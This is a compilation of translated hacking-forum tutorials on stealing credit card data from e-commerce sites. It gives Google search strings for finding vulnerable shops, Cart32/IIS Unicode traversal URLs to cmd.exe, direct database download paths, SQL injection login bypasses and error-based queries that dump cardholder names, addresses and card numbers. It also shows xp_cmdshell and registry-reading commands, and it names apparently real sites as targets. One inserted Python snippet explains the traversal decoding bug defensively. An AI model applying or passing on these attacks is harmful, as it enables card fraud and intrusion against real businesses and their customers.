How to find: use Google. Search string: Cart32 v3.5a Result: pages that run the cart32.exe file. You will get some information. What do you get? Nothing yet. Username and password: not needed. And then? Suppose you have found the following vulnerable page: http://www.connectionsmall.com/scripts/cart32.exe/ Replace card32.exe with one of the following lines: I) ..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ II) ..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ III) ..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ Example: http://www.connectionsmall.com/scripts/........../winnt/system32/cmd.exe?/c+dir+c:\

- If nothing happens, add the following to the end of the address to get the credit cards: \progra~1\MWAInc\Cart32\ - You will see lines like these: 2814659000-001001.c32 2814659000-001002.c32 2814659000-001003.c32 - Now all that remains is to add one of the three, or try them one at a time, to the end of the address above. In the end we get something like this: http://www.connectionsmall.com/scripts/........../winnt/system32/cmd.exe?/c+dir+c:\progra~1\MWAInc\Cart32\2814659000-001001.c32
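The three encoded separators listed for the Cart32 bug (%c0%af, %e0%80%af and %c1%9c) are overlong UTF-8 encodings of '/' and '\'. The added example below (not code from HCEGROUP, IIS or Cart32) shows why they worked against a lenient decoder and how a strict decoder rejects them before any path check runs: lenient_decode reproduces the lenient behaviour, while canonical_path uses Python's built-in strict UTF-8 codec and only then looks for dot-dot segments. The request paths at the bottom are constructed for the example.

```python
from urllib.parse import unquote_to_bytes


def lenient_decode(raw):
    """Decode UTF-8 the way the affected servers did: accept any lead byte
    followed by the right number of continuation bytes, and never check that
    the shortest encoding was used. Overlong forms of '/' and '\\' therefore
    come out as real path separators."""
    out = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        if 0xC0 <= b < 0xE0:
            n, cp = 1, b & 0x1F
        elif 0xE0 <= b < 0xF0:
            n, cp = 2, b & 0x0F
        elif 0xF0 <= b < 0xF8:
            n, cp = 3, b & 0x07
        else:
            raise ValueError("invalid lead byte 0x%02x" % b)
        cont = raw[i + 1:i + 1 + n]
        if len(cont) != n:
            raise ValueError("truncated multibyte sequence")
        for c in cont:
            if c & 0xC0 != 0x80:
                raise ValueError("bad continuation byte 0x%02x" % c)
            cp = (cp << 6) | (c & 0x3F)
        out.append(chr(cp))
        i += n + 1
    return "".join(out)


def lenient_path(url_path):
    """Percent-decode, then decode leniently: what the vulnerable server saw."""
    return lenient_decode(unquote_to_bytes(url_path))


def canonical_path(url_path):
    """Percent-decode, then decode strictly (the built-in codec rejects overlong
    sequences), and only then check for dot-dot segments.
    Returns (path, None) when acceptable, (None, reason) when it must be refused."""
    raw = unquote_to_bytes(url_path)
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError as exc:
        return None, "invalid or overlong UTF-8 in path: " + exc.reason
    if ".." in text.split("/"):
        return None, "dot-dot segment after decoding"
    return text, None


if __name__ == "__main__":
    # Constructed request paths using the three encodings from the tutorial above.
    for p in ("/scripts/..%c0%af../winnt/system32/cmd.exe",
              "/scripts/..%e0%80%af../winnt/system32/cmd.exe",
              "/scripts/..%c1%9c../winnt/system32/cmd.exe",
              "/store/commerce.cgi"):
        print(p, "->", lenient_path(p), "|", canonical_path(p))
```

The lenient decoder turns each encoded separator into a real one, so a check for ".." done before decoding sees nothing while the file system later sees a traversal; decoding strictly first means the request is refused at the codec and the dot-dot check only ever runs on canonical text.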

============================

III - The Commerce.cgi bug
How to find: use Google. Search string: Commerce.cgi Result: pages that run the Commerce.cgi file. Suppose you have found the following vulnerable page: http://www.warresisters.org/store/commerce.cgi Replace commerce.cgi with admin_files/commerce_user_lib.pl Example: http://www.warresisters.org/store/admin_files/commerce_user_lib.pl You will get some information: $sc_sales_tax = ".0825"; $sc_sales_tax_state = "NY"; $sc_send_order_to_email = "yes"; $sc_order_log_name = "onlinebookstore.log"; $sc_send_order_to_log = "yes";

$shipping_percentage = ".15"; $sc_order_email = "wrl\@igc.org"; $sc_root_url = "http://www.warresisters.org/store"; $sc_admin_email = "lit\@warresisters.org"; $sc_domain_name_for_cookie = ".warresisters.org"; $sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi"; $sc_root_web_path = "/home/serve/resist/Html/Products"; $sc_path_for_cookie = "/store"; $path_to_html = "../Html"; 1; What do you get? Some important information about the database. Username and password: not needed. Then: delete commerce_user_lib.pl and replace it with the string found in $sc_order_log_name, and ....
============================
III - The shopdisplaycategories bug
How to find: use Google. Search string: shopdisplaycategories Result: in the link of the vulnerable pages, replace shopdisplaycategories.asp with shopdbtest.asp What do you get? You learn the path to the credit card database. Username and password: not needed. Then: replace shopdbtest.asp with the reply given for xdatabase (which you found above).
============================

IV - The SQL Injection bug
How to find: use Google. Search string: admentor Result: go to the vulnerable page and log in with Username and Password 'or''=' What do you get? Now you control every management operation of the website in the role of Admin. Username and password: 'or''=' Then: find out for yourself.
============================
IV - The datasources bug
How to find: use Google. Search string: datasources/ or config/datasources/ Result: the path of those vulnerable pages. What do you get? From here, add expire.mdb after datasources/ or config/datasources/ Username and password: not needed. Then: you download the data store that holds the credit cards.

TUTORIAL BY CVHINT
- It has been a long time since I dropped by the forum to hang out, and I was afraid you would miss me. So I would like to contribute a post as a small contribution to the forum; besides, because of the hacking I won't be taking part for a long while, so sharing all of my shop-hacking experience with you is only a matter of time, so whoever likes easy CCs should pay attention to this post of mine. Now let's get to the main point of this post. I know everyone knows how to hack shops, but how to hack so that you actually get CCs very many people don't know, or if they do, the shop dies before they get to cash in, because the method is one everyone knows (if I am not mistaken everyone has been through Hieupc's post). So I will show you a new way of hacking with SQL that is not yet widespread and that few people hack with. But let me say a few words first. I once browsed the viethacker sites and went into the SQL discussion box to have a look, and many people gave this opinion: "SQL is an outdated bug". Heavens, hearing that is sad. Let me tell you, SQL is not outdated at all; the main thing is whether or not you can turn the outdated bug into a widespread bug of your own, and that is another story. OK, too much talk is tiring, so here is the post: go to Google and search with whatever keywords you know. I will contribute a few keywords; if you know one, share it with everyone: shopcategories.asp?id= /shop/ shopping product.asp?ProductID allinurl:"shopdisplayproducts.asp?id= allinurl:"shopdisplayproducts.asp?id=1 allinurl:"shopdisplayproducts.asp?id=2 allinurl:".com/shopdisplayproducts.asp?id= allinurl:".net/shopdisplayproducts.asp?id= .asp?=catalogid= .asp?cid= alliurl: shop$.asp?$= shopexd.asp? shopreviewlist.asp?id=1 shopreviewadd.asp?id= Then search for a shop, say one like this: www.cvhint.com/shopdisplayproducts.p?id=1 Then, when you add ' and it shows no error, what do you do? Heavens, surely it isn't unvulnerable. Well, you'll find out soon enough. Let's try swapping in another link. In this example I replace shopdisplayproducts.asp?id=1 with shoptellafriend.asp.asp?id=1 and add ' to see. OOOOOOh, there's the error. Good. Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'catalogid = 12''.
/vshop/shoptellafriend.asp, line 183 The reason I call this advanced is that you should pay attention to its line number. Usually those of you hacking by Hieupc's post can only hack lines with a high number, while for lines under 200 you are usually stumped, right? (I ran into this all the time before, so I know.) Continue with the query hieupc showed you, try the numbers slowly, and a special number will come out, usually number 3; this is battlefield experience I am sharing with you:

line191 >>> 56
line184 >>> 47,43,53
line188 >>> 53,56,60
line191 >>> 48
line185 >>> 86,43
line202 >>> 84,91
line208 >>> 48,57
line64 >>> 53
line211,187 >>> 43
line59 >>> 70
line58 >>> 43
---------------
These are the commonly encountered lines. Later on, when you meet these lines you only need to try the numbers up to the ones above, and number 3 comes out for exploiting. Next, once the table containing number 3 appears and we need to get the user and pass, enter this: fldusername%2b'/'%2bfldpassword When you enter that query, the pass and user come out right at number 3. As for the admin link, it is usually shopadmin.asp, but with this method of mine, if you take shopadmin.asp as the link it almost never works. I will show you the next part later; right now I'm hungry and off to eat. I hope you understand this post of mine and practise it successfully. I don't write with anything called punctuation like the others; just read and understand and you'll get good shops that last a long time. This is an advanced form that is somewhat dangerous, so I can't give you an example; if anyone searches and finds a site, post it so everyone can hack it together. Bye. Copyright: cvhint and a friend.

TUTORIAL FROM VIETHACKER


You have all heard a lot about sql-injection; many of you are proficient, but there are still many who are new to web programming and do not know it yet, so let me re-post it, based on the sql-inject articles from the Vicki group, Viethacker.net ... and a few other places.

+ What is SQL Injection?
SQL Injection is one of the kinds of web hacking that is gradually becoming common nowadays. By injecting SQL query/command code into the input before it is passed to the web application for processing, you can log in (with Admin rights) without a username and password, execute remotely, dump data and get root on the SQL server. The attack tool is any web browser, for example Internet Explorer, Netscape, ...

+ Well, understanding SQL-inject is simply that; I will go on to analyze how the bug is exploited, and everyone has their own way of handling it.
Example: http://www.xxx.com/item.asp?item_id=1
- check whether it is vulnerable: add ' : http://www.xxx.com/item.asp?item_id=1'
If an error like this example is displayed:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
C:\INETPUB\WWWROOT\xxx\INCLUDE\../lib/dblib.asp, line 95
then this site is SQL-Injectable and we can fully exploit it by "question and answer" --> Many of you, on seeing an error like this, immediately use the command to get all the tables and columns in the data:
http://www.xxx.com/item.asp?item_id=1%2bco...hema.tables))-
You get the first table as the result:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'T005_CC_PACKAGES' to a column of data type int.
C:\INETPUB\WWWROOT\xxx\INCLUDE\../lib/dblib.asp, line 95
'T005_CC_PACKAGES' is a table in the data. To get the next table name we just use:
http://www.xxx.com/item.asp?item_id=1%2bco...n_schema.tables where table_name not in ('T005_CC_PACKAGES' )))-
and continue until the message Invalid item appears, which means the tables are exhausted.
To get the column names in a table, do the following:
http://www.xxx.com/item.asp?item_id=1%2bco...n_schema.colums where table_name='table name'))-
to get more, again use not in:
http://www.xxx.com/item.asp?item_id=1%2bco...n_schema.colums where table_name="table name" not in ('known column','known column')))-
Get the values in a column:
http://www.xxx.com/item.asp?item_id=1%2bco...201%20'column name'%20from 'table containing the column'))-
The goal of many of you is to get all the information about the data's tables and columns in order to exploit the site's admin login account. But the step-by-step way above is very tiring: when the link is too long IE keeps erroring, so you always have to use another browser (Mozilla or Netscape...).
+ There is another, faster way: log in with user: 'or''=' pass: 'or''=' ; for example, if you are lucky you will find the place to log in to the site's management section.

A summary of the most basic ways of hacking CC!


Usually hackers hack CC through the serious bugs of shopping sites all over the world (there are still countless unfixed sites)... the commonly met bugs are:
acart2_0
SalesCart Database Storage Insecurity
In the file shopper.cgi
Cart32 Sites
VP-ASP
ProductCart
............
Below is a detailed article on how to hack these bugs; of course I am not the one who found them... these bugs were found a very long time ago... and have been passed around and around... to the point that nobody remembers who the author is anymore...!!!

--------------------------------------------------------------------------------------------
The "acart2_0" bug:
First go to http://google.com/ (you can use other search sites such as http://av.com/ ....) and search for the keyword "acart2_0"; you will see a lot of files with this bug. From experience I advise picking sites of the form http://url/acart2_0/ , for example the site http://www.coolrob.com/cart/acart2_0 ; type "/acart2_0.mdb" right after the url, press enter, and if you see a download screen you have succeeded... you can download the shop's whole *.mdb database file...

--------------------------------------------------------------------------------------------
The VP-ASP bug:
First go to http://google.com/ and search for the keyword "shopdisplaycategories"; click a site and you will see http://www.sitename.com/shopping/shopdisplaycategories.asp
The next thing is to change the url http://www.sitename.com/shopping/shopdisplaycategories.asp into the url http://www.sitename.com/shopping/shopdbtest.asp , that is, replace shopdisplaycategories.asp with shopdbtest.asp, then press enter... if yet another page comes up <--- not a "no page" error, then you have a chance to download this site's *.mdb... once the new page has come up, apply the formula
http:// [vp-asp site] / [ vp-asp dir ] / [ xDatabase + .mdb ]
- [vp-asp site] is: http://www.sitename.com/
- [vp-asp dir] is: shopping
- [xDatabase + .mdb] will be shopping.mdb
If a save screen appears you have succeeded...

----------------------------------------------------------------------------------------------
The shopper.cgi bug:
Go to http://google.com/ and search for the keyword shopper.cgi or shopper.exe, copy urls of the form sitename.com/cgi-bin/shopper.cgi? then paste into the browser and add the string search=action&keywords=ccpower&template=shopper.conf or add the string search=action&keywords=ccpower&template=order1.log right after it; if you are lucky you will find CC.

-----------------------------------
The ProductCart bug:
Search with the keyword allinurl: /productcart/
http://www.ackits.com/ProductCart/pc/msg.asp?
Delete everything after ProductCart and type in this: http://www.ackits.com/ProductCart/ then add database/EIPC.mdb after it, which becomes http://www.ackits.com/ProductCart/database/EIPC.mdb ; at this point we can download the .mdb file, and after downloading it I suppose everyone knows what to do...
................................................
The Cart32.exe bug:
Go to google.com and search for the keyword "Cart32.exe v3". First go to http://www.sitename.com/cgi-bin/cart32.exe/sitename
Getting Credit Cards: http://www.sitename.com/cgi-bin/cart32/sitename-ORDERS.txt or: http://www.sitename.com/cgi-bin/cart32/sitename-OUTPUT.txt

Hacking CC via the SalesCart Database Storage Insecurity bug:
Overview: this bug is really that the data of shopping programs is not secured, encrypted or stored carefully, so you can get it quite easily.
Note: sometimes in practice some links may differ; it is not always completely right; the data sometimes includes CRD (Credit Card), so everything must go through a proxy (if you have no proxy you can go to an internet cafe...)
Exploitation: use one of the following links:
www.victim.com/fpdb/shop.mdb
www.victim.com/shoponline/fpdb/shop.mdb
www.victim.com/database/metacart.mdb
www.victim.com/shopping/database/metacart.mdb
www.victim.com/shop/database/metacart.mdb
www.victim.com/metacart/database/metacart.mdb
www.victim.com/mcartfree/database/metacart.mdb
www.victim.com/ASP/cart/database/metacart.mdb
Example: the site 84vn.com can have its CC downloaded from here: www.84vn.com/database/metacart.mdb
Which means the database has no security at all. Download it and off you go!
The database may include: name, surname, address, e-mail, phone number, credit card number, company name.....
You can exploit this data, but in practice things do not always go smoothly; imagine that every server has its own structure, for example the path is not always fpdb/... or like the links above, so take advantage of the bug and try each one; sometimes it is www.victim.com/muaban/fpdb/shop.mdb , so if you use this method be flexible with the link depending on each site! <----copy by h4a......

Go to google and search for the keyword "inurl:commerce.cgi". Then, OK, pick an online address that is waiting, for example we have the site <http://www.warresisters.org/store/commerce.cgi>? ; delete the commerce.cgi? and replace it with Admin_files/commerce_user_lib.pl and we get:

## This file contains the user specific variables
## necessary for Commerce.cgi
$sc_sales_tax = ".0825";
$sc_sales_tax_state = "NY";
$sc_send_order_to_email = "yes";
$sc_order_log_name = "onlinebookstore.log";
$sc_send_order_to_log = "yes";
$shipping_percentage = ".15";
$sc_order_email = "wrl\@igc.org";
$sc_root_url = "http://www.warresisters.org/store";
$sc_admin_email = "lit\@warresisters.org";
$sc_domain_name_for_cookie = ".warresisters.org";
$sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi";
$sc_root_web_path = "/home/serve/resist/Html/Products";
$sc_path_for_cookie = "/store";
$path_to_html = "../Html";
1;

Delete commerce_user_lib.pl and replace it with onlinebookstore.log (look for $sc_order_log_name) and .... the rest is up to you.
-----------------------------------------------------------------------------------------------
Go to google and type the keyword tek9.asp; we get links of a form similar to this https://ionicpurifier.com/tek9.asp?pg=orders&mode=search ; now, in front of /tek9.asp/ type in /intranet : https://ionicpurifier.com/intranet/tek9.asp...ers&mode=search
Then log in with the user and pass 'or''=' ; if you are lucky you will get in, and there is CC galore; plenty of sites still have this bug.
-----------------------------------------------------------------------------------------------
Search the keyword on google.com.vn: " Shoping /admin "
http://shopping.richardhealey.com/admin_login.asp
http://families-online.org/admin_login.asp
user/pass: ' or 1=1--
The site's code allows exploiting all the way up to the SQL Server.
------------------------------------------------------------------------------------------------

Hacking shops via the SQL Server injection bug

A quick introduction for you to hacking with sql server inject! Hacking by the convert technique, which roughly means converting an expression of string type to int type, which cannot be done and so produces an error message (there are shops where we do not receive its message, because value=hidden), so first, to hack an ODBC MySQL server 2000 or 7.0 shop you should at least look over the source a little, so that you know which way to hack. Here I only introduce the convert method, used to obtain the error message; if you want to hack the whole server there is a lot more to say, too long-winded...
Details: search on whichever search engines you like; there are many search engines you commonly use, such as http://www.google.com/ or http://www.froogle.google.com/ http://www.av.com/ http://www.alltheweb.com/ yahoo.com ......
ok----search for: allinurl: "/shop/viewproduct.asp" or you can search with the keyword allinurl: "/shop/index.asp" (these keywords have not been confirmed accurate, because they return a great many sites that are not ODBC MySQL database but are usually JSP (java server page) or JET, or VB.net....net, and this needs your effort in testing). ok, once you have targets, pick one at random, for example:

http://www.mcmessentials.com.au/shop/viewp...20&categoryid=5

okay, got a target, let's start testing it:
http://www.mcmessentials.com.au/shop/viewp...tegoryid=5'
If its DB was written with ODBC MySQL server you will receive the following message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/shop/include/viewproduct.asp, line 3
okay, and if not you see nothing at all, or you have to look in the source to know.
ok, start finding tables; you can test in the following ways that I know:
;having 1=1--sp_password
'having 1=1--sp_password
"having 1=1--sp_password
(having 1=1--sp_password
)having 1=1--sp_password
(space)having 1=1--_sp_password
(%20 is space, that is a blank)
usually testing with the query (space)having 1=1--sp_password gets through ok
*note, one very necessary thing for you, 1-- %2b means the + sign, but passing + directly will be filtered out by SQL; --sp_password is required to mask the log and avoid detection
http://www.mcmessentials.com.au/shop/viewp...=1--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'categories.label' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/shop/include/viewproduct.asp, line 9
We know the table is categories and the column is label; now we go and get all the tables of the column label belonging to the table categories. Now get the shop's user_name through the following query %2bconvert(int,user_name())--sp_password ; in full it is
http://www.mcmessentials.com.au/shop/viewp...))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'braunshop' to a column of data type int.
/shop/include/viewproduct.asp, line 3

'braunshop' is the shop's user_name field.
*note 2-- the user_name() field is to determine the current user; if it is dbo then we are able to hack straight into the whole server without needing admin rights, otherwise there are intermediate steps to take it over. ok, we stop at getting cc from the shop only and will not talk about taking the whole server; the purpose is mainly for you to learn and exchange experience, not to lure you into serious destruction of anyone else, so I only post up to the part about getting cc; if anyone has a grudge against someone and wants to deface, get the pass, get root, get the server or host, contact me.
ok, now we will get the tables on the column label one by one. Get table 1 through the following query
%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
in full it is
http://www.mcmessentials.com.au/shop/viewp...))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'categorieslist' to a column of data type int.
/shop/include/viewproduct.asp, line 3
ok, table 1 is 'categorieslist'; to get table 2 you have to use where table_name not in('table1'); the query is as follows:
%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in('categorieslist')))--sp_password
http://www.mcmessentials.com.au/shop/viewp...))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'allorders' to a column of data type int.
/shop/include/viewproduct.asp, line 3
Table 2 is 'allorders'. To get table 3 and the remaining tables keep doing the same as for table 2:
%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in('categorieslist','allorders')))--sp_password
Here are all the tables of the shop just obtained:
'categorieslist','allorders','categories','categorymembers','deliveryZones','dtproperties','essorders','fullorder','keywords','optiongroupmembers','optiongroups','optiongroupslist','optionmembers','options','optionslist','orderoptions','orderoptions-options','orderproducts','orderproducts-products','orders','products','productscategories','products-options','searchresults','sysconstraints','syssegments'

ok, after getting all the tables you start getting the columns of the table; there are 2 ways of getting columns: 1 is getting all the columns, with no particular purpose or to check the whole database; 2 is when we have already determined which table we need the columns from, and only then get them. I only get the columns in the tables that have cc, 'allorders' or 'orders'; ok, let's get them. The query to get the first column is:
1--- get columns over all tables, regardless of which table they belong to, until they run out; the query has the form
%2bconvert(int,(select top 1 column_name from information_schema.columns))--sp_password
once you have column1, use where column_name not in('column1') ok
2-- get columns on a predetermined table; the query is as follows, for example I get the columns on the table orders
%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name ='orders'))--sp_password
http://www.mcmessentials.com.au/shop/viewp...))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'orderid' to a column of data type int.
/shop/include/viewproduct.asp, line 3
The first column is 'orderid'; to get column 2 you need to add and column_name not in('orderid')
%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name ='orders' and column_name not in('orderid')))--sp_password
http://www.mcmessentials.com.au/shop/viewp...))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'created' to a column of data type int.
/shop/include/viewproduct.asp, line 3
and get all the columns of the table 'orders' one after the other. Once you have all the columns of the table 'orders', only the last and most attractive job remains, which is getting cc; write a query to get cc based on all the columns you received. Each shop has different database fields, but almost all shops found with allinurl: "/shop?viewproduct.asp" have only one single kind of query, because I have tried all of them, hehe, and every one was ok; to save you the trouble of rearranging to write the query yourself, I will just give it to you to play with. Get the first cc:

%2bconvert(int,(select%20top%201%20cardtype%2b'%20 Name:'%2bcardname%2b'%20addr:%20'%2baddress% 2b'%20 suburb:%20'% 2bsuburb%2b'%20state:%20'%2bstate%2b'%20zip:%20'%2 bpostcode%2b'%20country:%20'%2bcountry%2b'% 20phone :%20'%2bphone% 2b'%20email:%20'%2bemail%2b'%20cardnumber:%20'%2bc ardnumber%2b'%20expireymonth:%20'% 2bexpirymonth%2b '%20year:%20'% 2bexpiryyear%20from%20orders))--sp_password
To get the 2nd cc, add after it .... from orders where cardnumber not in('first card number') and get all the credit cards on there in turn; the shop above is just for you to practise on and gain more experience, because this is only for learning, not aimed at harming anyone.

Advanced SQL Inject hacking
Look at an SQL query:
select id, forename, surname from authors
'id', 'forename' and 'surname' are columns of the table authors; when the query above runs it returns all the rows in the table authors. Look at the following query:
select id, forename, surname from authors where forename = 'john' and surname = 'smith'
This is a conditional query; no need to say it, you know; it returns everyone in the database with forename = 'john' and surname = 'smith'.
So when an input value is entered that is not right, as in the database:
Forename: jo'hn
Surname: smith
the query becomes:
select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith'
When the query above is processed it raises an error:
Server: Msg 170, Level 15, State 1, Line 1
Line 1: Incorrect syntax near 'hn'.
The reason is that we inserted a single quote "'" and the input value became 'hn', which is wrong with respect to the database, so an error arises. Taking advantage of this, an attacker can delete your data as follows:
Forename: jo'; drop table authors--
The table authors will be deleted > dangerous, isn't it.
Look at the following asp code: this is a login form

<HTML>
<HEAD>
<TITLE>Login Page</TITLE>
</HEAD>
<BODY bgcolor='000000' text='cccccc'>
<FONT Face='tahoma' color='cccccc'>
<CENTER><H1>Login</H1>
<FORM action='process_login.asp' method=post>
<TABLE>
<TR><TD>Username:</TD><TD><INPUT type=text name=username size=100% width=100></INPUT></TD></TR>
<TR><TD>Password:</TD><TD><INPUT type=password name=password size=100% width=100></INPUT></TD></TR>
</TABLE>
<INPUT type=submit value='Submit'> <INPUT type=reset value='Reset'>
</FORM>
</FONT>
</BODY>
</HTML>

This is the code of 'process_login.asp':

<HTML>
<BODY bgcolor='000000' text='ffffff'>
<FONT Face='tahoma' color='ffffff'>
<STYLE>
p { font-size=20pt ! important}
font { font-size=20pt ! important}
</STYLE>
<%@LANGUAGE = JScript %>
<%
function trace( str )
{
    if( Request.form("debug") == "true" )
        Response.write( str );
}

function Login( cn )
{
    var username;
    var password;
    username = Request.form("username");
    password = Request.form("password");
    var rso = Server.CreateObject("ADODB.Recordset");
    // The form fields are concatenated straight into the SQL text; this is the injection point
    var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
    trace( "query: " + sql );
    rso.open( sql, cn );
    if (rso.EOF)
    {
        rso.close();
%>
<FONT Face='tahoma' color='cc0000'>
<H1> <BR><BR>
<CENTER>ACCESS DENIED</CENTER>
</H1>
</BODY>
</HTML>
<%
        Response.end
        return;
    }
    else
    {
        Session("username") = "" + rso("username");
%>
<FONT Face='tahoma' color='00cc00'>
<H1>
<CENTER>ACCESS GRANTED<BR>
<BR>
Welcome,
<%
        Response.write(rso("Username"));
        Response.write( "</BODY></HTML>" );
        Response.end
    }
}

function Main()
{
    //Set up connection
    var username
    var cn = Server.createobject( "ADODB.Connection" );
    cn.connectiontimeout = 20;
    cn.open( "localserver", "sa", "password" );
    username = new String( Request.form("username") );
    if( username.length > 0)
    {
        Login( cn );
    }
    cn.close();
}
Main();
%>

Here is the SQL query:
var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
If the hacker enters the following:
Username: '; drop table users--
Password:
then the table 'users' will be deleted, and we can bypass as follows (you all know bypass already, so I will not repeat it); in the username field the hacker can enter:
Username: ' union select 1, 'fictional_user', 'some_password', 1--
for example, if the table users was created as follows:
create table users( id int, username varchar(255), password varchar(255), privs int )
and populated with:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )
insert into users values( 0, 'guest', 'guest', 0x0000 )
insert into users values( 0, 'chris', 'password', 0x00ff )
insert into users values( 0, 'fred', 'sesame', 0x00ff )
Hackers can learn the columns and the table from the result of the query having 1=1:
Username: ' having 1=1--
The error raised:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/process_login.asp, line 35
Continue getting the remaining ones:
Username: ' group by users.id having 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 35
>> the column 'username' is now known
' group by users.id, users.username, users.password, users.privs having 1=1--
Stop when there is no more error; now you know the table and columns to exploit, and next comes getting their values. To determine the content of a column we use the sum() function:
Username: ' union select sum(username) from users--
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
/process_login.asp, line 35

The value of username is varchar; no need to explain why. What about using it with id:
Username: ' union select sum(id) from users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/process_login.asp, line 35
So we can insert into the database:
Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff)--
Getting the server version:
Username: ' union select @@version,1,1,1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of data type int.
/process_login.asp, line 35
You can use convert(), but I will show you union; try reading the content of the users in the table as follows:
Username: ' union select min(username),1,1,1 from users where username > 'a'--
Select the smallest value of username and require it to be greater than 'a' > the error raised:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.
/process_login.asp, line 35
So we know the 'admin' account exists; let's continue and see:

Username: ' union select min(username),1,1,1 from users where username > 'admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int.
/process_login.asp, line 35
So once we have the username > get the pass:
Username: ' union select password,1,1,1 from users where username ='admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int.
/process_login.asp, line 35
Here is a technique by which you can get the users in a more advanced way. Create a script like this:
begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end
> the query:
Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end--
This creates a table 'foo' with one column, 'ret'. Continue:
Username: ' union select ret,1,1,1 from foo--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int.
/process_login.asp, line 35
(It seems mrro used this kind of thing against VDC)
Cleaning up traces:
Username: '; drop table foo--
A hacker who already holds the database wants more than that: to control the server's whole network system. Some of the ways:
1- Use xp_cmdshell when holding 'sa' rights
2- Use xp_regread to read the registry, including the SAM
3- Run linked queries on the server
4- Create scripts on the server to exploit
5- Use 'bulk insert' to read any file on the system
6- Use bcp to create text files on the server
7- Use sp_OACreate, sp_OAMethod and sp_OAGetProperty to create (ActiveX) scripts that run on the server
[xp_cmdshell]
You have surely heard a lot about it already; for example:
exec master..xp_cmdshell 'dir'
exec master..xp_cmdshell 'net1 user'
Used to execute DOS commands, etc.. very effective
[xp_regread]
Related functions...
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
Example:
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'
Determines whether null-session shares exist on the server
exec xp_regenumvalues HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
and... plenty more
[Other Extended Stored Procedures]
services:
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
